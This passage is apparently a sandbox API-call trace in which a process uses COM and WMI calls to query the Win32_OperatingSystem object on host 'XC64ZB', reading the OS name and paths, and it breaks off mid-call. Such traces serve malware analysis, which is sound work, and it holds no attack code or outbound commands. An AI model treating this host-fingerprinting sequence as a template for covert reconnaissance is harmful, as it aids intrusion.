[0184.488] IUnknown:QueryInterface (in: This=0x5460f8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e26c | out: ppvObject=0x19e26c*=0x0) returned 0x80004002 [0184.489] IUnknown:QueryInterface (in: This=0x5460f8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e278 | out: ppvObject=0x19e278*=0x5460fc) returned 0x0 [0184.489] IMarshal:GetUnmarshalClass (in: This=0x5460fc, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e280 | out: pCid=0x19e280*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0184.489] IUnknown:Release (This=0x5460fc) returned 0x3 [0184.489] CoGetContextToken (in: pToken=0x19e2d8 | out: pToken=0x19e2d8) returned 0x0 [0184.489] CoGetContextToken (in: pToken=0x19e6e0 | out: pToken=0x19e6e0) returned 0x0 [0184.489] IUnknown:QueryInterface (in: This=0x5460f8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e76c | out: ppvObject=0x19e76c*=0x0) returned 0x80004002 [0184.489] IUnknown:Release (This=0x5460f8) returned 0x2 [0184.489] CoGetContextToken (in: pToken=0x19ecb8 | out: pToken=0x19ecb8) returned 0x0 [0184.489] CoGetContextToken (in: pToken=0x19ec18 | out: pToken=0x19ec18) returned 0x0 [0184.489] IUnknown:QueryInterface (in: This=0x5460f8, riid=0x19ece8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ece4 | out: ppvObject=0x19ece4*=0x5460f8) returned 0x0 [0184.489] IUnknown:AddRef (This=0x5460f8) returned 0x4 [0184.489] IUnknown:Release (This=0x5460f8) returned 0x3 [0184.489] IUnknown:Release (This=0x5460f8) returned 0x2 [0184.489] CoTaskMemFree (pv=0x596cd8) [0184.489] CoGetContextToken (in: pToken=0x19f030 | out: pToken=0x19f030) returned 0x0 [0184.489] IUnknown:AddRef (This=0x5460f8) returned 0x3 [0184.489] CoTaskMemAlloc (cb=0x4) returned 0x596cd8 [0184.489] IEnumWbemClassObject:Next (in: This=0x599ad8, lTimeout=-1, uCount=0x1, apObjects=0x596cd8, puReturned=0x2313014 | out: apObjects=0x596cd8*=0x0, puReturned=0x2313014*=0x0) returned 0x1 [0184.490] CoTaskMemFree (pv=0x596cd8) [0184.490] CoGetContextToken (in: pToken=0x19f1a0 | out: pToken=0x19f1a0) returned 0x0 [0184.490] IUnknown:AddRef (This=0x59a438) returned 0x3 [0184.490] IEnumWbemClassObject:Clone (in: This=0x59a438, ppEnum=0x19f360 | out: ppEnum=0x19f360*=0x59a118) returned 0x0 [0184.491] IUnknown:QueryInterface (in: This=0x59a118, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f21c | out: ppvObject=0x19f21c*=0x59a11c) returned 0x0 [0184.491] IClientSecurity:QueryBlanket (in: This=0x59a11c, pProxy=0x59a118, pAuthnSvc=0x19f26c, pAuthzSvc=0x19f268, pServerPrincName=0x19f260, pAuthnLevel=0x19f264, pImpLevel=0x19f254, pAuthInfo=0x19f258, pCapabilites=0x19f25c | out: pAuthnSvc=0x19f26c*=0xa, pAuthzSvc=0x19f268*=0x0, pServerPrincName=0x19f260, pAuthnLevel=0x19f264*=0x6, pImpLevel=0x19f254*=0x2, pAuthInfo=0x19f258, pCapabilites=0x19f25c*=0x1) returned 0x0 [0184.491] IUnknown:Release (This=0x59a11c) returned 0x1 [0184.491] IUnknown:QueryInterface (in: This=0x59a118, riid=0x65a61224*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f210 | out: ppvObject=0x19f210*=0x5b0230) returned 0x0 [0184.491] IUnknown:QueryInterface (in: This=0x59a118, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1fc | out: ppvObject=0x19f1fc*=0x59a11c) returned 0x0 [0184.492] IClientSecurity:SetBlanket (This=0x59a11c, pProxy=0x59a118, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.493] IUnknown:Release (This=0x59a11c) returned 0x2 [0184.493] WbemLocator:IUnknown:Release (This=0x5b0230) returned 0x1 [0184.493] CoTaskMemFree (pv=0x598b28) [0184.493] IUnknown:QueryInterface (in: This=0x59a118, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19edf8 | out: ppvObject=0x19edf8*=0x5b0230) returned 0x0 [0184.493] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0230, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19edb4 | out: ppvObject=0x19edb4*=0x0) returned 0x80004002 [0184.494] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0230, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ebd4 | out: ppvObject=0x19ebd4*=0x0) returned 0x80004002 [0184.494] IUnknown:QueryInterface (in: This=0x59a118, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e9ac | out: ppvObject=0x19e9ac*=0x0) returned 0x80004002 [0184.494] WbemLocator:IUnknown:AddRef (This=0x5b0230) returned 0x3 [0184.494] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0230, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e70c | out: ppvObject=0x19e70c*=0x0) returned 0x80004002 [0184.495] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0230, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e6bc | out: ppvObject=0x19e6bc*=0x0) returned 0x80004002 [0184.495] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0230, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6c8 | out: ppvObject=0x19e6c8*=0x5b018c) returned 0x0 [0184.495] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5b018c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e6d0 | out: pCid=0x19e6d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.495] WbemLocator:IUnknown:Release (This=0x5b018c) returned 0x3 [0184.495] CoGetContextToken (in: pToken=0x19e728 | out: pToken=0x19e728) returned 0x0 [0184.495] CoGetContextToken (in: pToken=0x19eb30 | out: pToken=0x19eb30) returned 0x0 [0184.495] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0230, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebbc | out: ppvObject=0x19ebbc*=0x5b0214) returned 0x0 [0184.495] WbemLocator:IRpcOptions:Query (in: This=0x5b0214, pPrx=0x5b0230, dwProperty=2, pdwValue=0x19ebc8 | out: pdwValue=0x19ebc8) returned 0x80004002 [0184.495] WbemLocator:IUnknown:Release (This=0x5b0214) returned 0x3 [0184.495] WbemLocator:IUnknown:Release (This=0x5b0230) returned 0x2 [0184.495] CoGetContextToken (in: pToken=0x19f108 | out: pToken=0x19f108) returned 0x0 [0184.495] CoGetContextToken (in: pToken=0x19f068 | out: pToken=0x19f068) returned 0x0 [0184.495] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0230, riid=0x19f138*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f134 | out: ppvObject=0x19f134*=0x59a118) returned 0x0 [0184.495] IUnknown:AddRef (This=0x59a118) returned 0x4 [0184.495] IUnknown:Release (This=0x59a118) returned 0x3 [0184.495] IUnknown:Release (This=0x59a118) returned 0x2 [0184.495] IUnknown:Release (This=0x59a438) returned 0x2 [0184.495] SysStringLen (param_1=0x0) returned 0x0 [0184.495] IEnumWbemClassObject:Reset (This=0x59a118) returned 0x0 [0184.496] CoTaskMemAlloc (cb=0x4) returned 0x596cf8 [0184.496] IEnumWbemClassObject:Next (in: This=0x59a118, lTimeout=-1, uCount=0x1, apObjects=0x596cf8, puReturned=0x23130f8 | out: apObjects=0x596cf8*=0x5a5978, puReturned=0x23130f8*=0x1) returned 0x0 [0184.503] IUnknown:QueryInterface (in: This=0x5a5978, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9b8 | out: ppvObject=0x19e9b8*=0x5a5978) returned 0x0 [0184.503] IUnknown:QueryInterface (in: This=0x5a5978, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e974 | out: ppvObject=0x19e974*=0x0) returned 0x80004002 [0184.503] IUnknown:QueryInterface (in: This=0x5a5978, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e794 | out: ppvObject=0x19e794*=0x0) returned 0x80004002 [0184.503] IUnknown:QueryInterface (in: This=0x5a5978, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e56c | out: ppvObject=0x19e56c*=0x0) returned 0x80004002 [0184.503] IUnknown:AddRef (This=0x5a5978) returned 0x3 [0184.503] IUnknown:QueryInterface (in: This=0x5a5978, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2cc | out: ppvObject=0x19e2cc*=0x0) returned 0x80004002 [0184.503] IUnknown:QueryInterface (in: This=0x5a5978, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e27c | out: ppvObject=0x19e27c*=0x0) returned 0x80004002 [0184.503] IUnknown:QueryInterface (in: This=0x5a5978, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e288 | out: ppvObject=0x19e288*=0x5a597c) returned 0x0 [0184.503] IMarshal:GetUnmarshalClass (in: This=0x5a597c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e290 | out: pCid=0x19e290*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0184.503] IUnknown:Release (This=0x5a597c) returned 0x3 [0184.504] CoGetContextToken (in: pToken=0x19e2e8 | out: pToken=0x19e2e8) returned 0x0 [0184.504] CoGetContextToken (in: pToken=0x19e6f0 | out: pToken=0x19e6f0) returned 0x0 [0184.504] IUnknown:QueryInterface (in: This=0x5a5978, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e77c | out: ppvObject=0x19e77c*=0x0) returned 0x80004002 [0184.504] IUnknown:Release (This=0x5a5978) returned 0x2 [0184.504] CoGetContextToken (in: pToken=0x19ecc8 | out: pToken=0x19ecc8) returned 0x0 [0184.504] CoGetContextToken (in: pToken=0x19ec28 | out: pToken=0x19ec28) returned 0x0 [0184.504] IUnknown:QueryInterface (in: This=0x5a5978, riid=0x19ecf8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ecf4 | out: ppvObject=0x19ecf4*=0x5a5978) returned 0x0 [0184.504] IUnknown:AddRef (This=0x5a5978) returned 0x4 [0184.504] IUnknown:Release (This=0x5a5978) returned 0x3 [0184.504] IUnknown:Release (This=0x5a5978) returned 0x2 [0184.504] CoTaskMemFree (pv=0x596cf8) [0184.504] CoGetContextToken (in: pToken=0x19f040 | out: pToken=0x19f040) returned 0x0 [0184.504] IUnknown:AddRef (This=0x5a5978) returned 0x3 [0184.504] IWbemClassObject:Get (in: This=0x5a5978, wszName="__GENUS", lFlags=0, pVal=0x19f350*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f3d0*=0, plFlavor=0x19f3cc*=0 | out: pVal=0x19f350*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f3d0*=3, plFlavor=0x19f3cc*=64) returned 0x0 [0184.504] IWbemClassObject:Get (in: This=0x5a5978, wszName="__PATH", lFlags=0, pVal=0x19f334*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f3b8*=0, plFlavor=0x19f3b4*=0 | out: pVal=0x19f334*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XC64ZB\"", varVal2=0x0), pType=0x19f3b8*=8, plFlavor=0x19f3b4*=64) returned 0x0 [0184.504] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XC64ZB\"") returned 0x72 [0184.504] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XC64ZB\"") returned 0x72 [0184.504] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e4 [0184.505] SetEvent (hEvent=0x3b4) returned 1 [0184.505] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f30c*=0x4e4, lpdwindex=0x19f12c | out: lpdwindex=0x19f12c) returned 0x0 [0184.508] CoGetContextToken (in: pToken=0x19f1d8 | out: pToken=0x19f1d8) returned 0x0 [0184.508] CoGetContextToken (in: pToken=0x19f138 | out: pToken=0x19f138) returned 0x0 [0184.508] WbemDefPath:IUnknown:QueryInterface (in: This=0x5945f0, riid=0x19f208*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f204 | out: ppvObject=0x19f204*=0x5945f0) returned 0x0 [0184.508] WbemDefPath:IUnknown:AddRef (This=0x5945f0) returned 0x3 [0184.508] WbemDefPath:IUnknown:Release (This=0x5945f0) returned 0x2 [0184.508] WbemDefPath:IWbemPath:SetText (This=0x5945f0, uMode=0x4, pszPath="\\\\XC64ZB\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XC64ZB\"") returned 0x0 [0184.508] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f38c | out: puCount=0x19f38c*=0x2) returned 0x0 [0184.508] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f388*=0x0, pszText=0x0 | out: puBuffLength=0x19f388*=0xf, pszText=0x0) returned 0x0 [0184.508] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f388*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f388*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.508] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f380 | out: puCount=0x19f380*=0x2) returned 0x0 [0184.508] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f37c*=0x0, pszText=0x0 | out: puBuffLength=0x19f37c*=0xf, pszText=0x0) returned 0x0 [0184.509] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f37c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f37c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.509] IWbemClassObject:Get (in: This=0x5a5978, wszName="Name", lFlags=0, pVal=0x19f37c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2313954*=0, plFlavor=0x2313958*=0 | out: pVal=0x19f37c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x2313954*=8, plFlavor=0x2313958*=0) returned 0x0 [0184.509] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0184.509] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0184.509] IWbemClassObject:Get (in: This=0x5a5978, wszName="Name", lFlags=0, pVal=0x19f384*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2313954*=8, plFlavor=0x2313958*=0 | out: pVal=0x19f384*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0x2313954*=8, plFlavor=0x2313958*=0) returned 0x0 [0184.509] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0184.509] SysStringByteLen (bstr="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x80 [0184.536] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f398 | out: puCount=0x19f398*=0x2) returned 0x0 [0184.536] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f394*=0x0, pszText=0x0 | out: puBuffLength=0x19f394*=0xf, pszText=0x0) returned 0x0 [0184.536] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f394*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f394*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.543] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f240*=0x448, lpdwindex=0x19f0f4 | out: lpdwindex=0x19f0f4) returned 0x0 [0184.566] CoGetContextToken (in: pToken=0x19f000 | out: pToken=0x19f000) returned 0x0 [0184.566] CoGetContextToken (in: pToken=0x19efa8 | out: pToken=0x19efa8) returned 0x0 [0184.566] IUnknown:QueryInterface (in: This=0x524148, riid=0x6948da0c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ef84 | out: ppvObject=0x19ef84*=0x524158) returned 0x0 [0184.567] CObjectContext::ContextCallback () returned 0x0 [0184.569] IUnknown:Release (This=0x524158) returned 0x1 [0184.569] CoUnmarshalInterface (in: pStm=0x580940, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eff4 | out: ppv=0x19eff4*=0x5af530) returned 0x0 [0184.569] CoMarshalInterface (pStm=0x580940, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5af530, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0184.570] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ee94 | out: ppvObject=0x19ee94*=0x5af530) returned 0x0 [0184.570] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ee50 | out: ppvObject=0x19ee50*=0x0) returned 0x80004002 [0184.570] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ec6c | out: ppvObject=0x19ec6c*=0x0) returned 0x80004002 [0184.571] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19ea44 | out: ppvObject=0x19ea44*=0x0) returned 0x80004002 [0184.571] WbemLocator:IUnknown:AddRef (This=0x5af530) returned 0x3 [0184.571] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e7a4 | out: ppvObject=0x19e7a4*=0x0) returned 0x80004002 [0184.571] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e754 | out: ppvObject=0x19e754*=0x0) returned 0x80004002 [0184.571] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x5af48c) returned 0x0 [0184.571] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5af48c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e768 | out: pCid=0x19e768*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.571] WbemLocator:IUnknown:Release (This=0x5af48c) returned 0x3 [0184.571] CoGetContextToken (in: pToken=0x19e7c0 | out: pToken=0x19e7c0) returned 0x0 [0184.572] CoGetContextToken (in: pToken=0x19ebc8 | out: pToken=0x19ebc8) returned 0x0 [0184.572] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec54 | out: ppvObject=0x19ec54*=0x5af514) returned 0x0 [0184.572] WbemLocator:IRpcOptions:Query (in: This=0x5af514, pPrx=0x5af530, dwProperty=2, pdwValue=0x19ec60 | out: pdwValue=0x19ec60) returned 0x0 [0184.572] WbemLocator:IUnknown:Release (This=0x5af514) returned 0x3 [0184.572] WbemLocator:IUnknown:Release (This=0x5af530) returned 0x2 [0184.572] WbemLocator:IUnknown:Release (This=0x5af530) returned 0x1 [0184.572] CoGetContextToken (in: pToken=0x19ef40 | out: pToken=0x19ef40) returned 0x0 [0184.572] WbemLocator:IUnknown:AddRef (This=0x5af530) returned 0x2 [0184.572] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f1f8 | out: ppvObject=0x19f1f8*=0x5af50c) returned 0x0 [0184.572] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5af50c, pProxy=0x5af530, pAuthnSvc=0x19f248, pAuthzSvc=0x19f244, pServerPrincName=0x19f23c, pAuthnLevel=0x19f240, pImpLevel=0x19f230, pAuthInfo=0x19f234, pCapabilites=0x19f238 | out: pAuthnSvc=0x19f248*=0xa, pAuthzSvc=0x19f244*=0x0, pServerPrincName=0x19f23c, pAuthnLevel=0x19f240*=0x6, pImpLevel=0x19f230*=0x2, pAuthInfo=0x19f234, pCapabilites=0x19f238*=0x1) returned 0x0 [0184.572] WbemLocator:IUnknown:Release (This=0x5af50c) returned 0x2 [0184.572] WbemLocator:IUnknown:QueryInterface (in: This=0x5af530, riid=0x65a61224*(Data1=0x0, 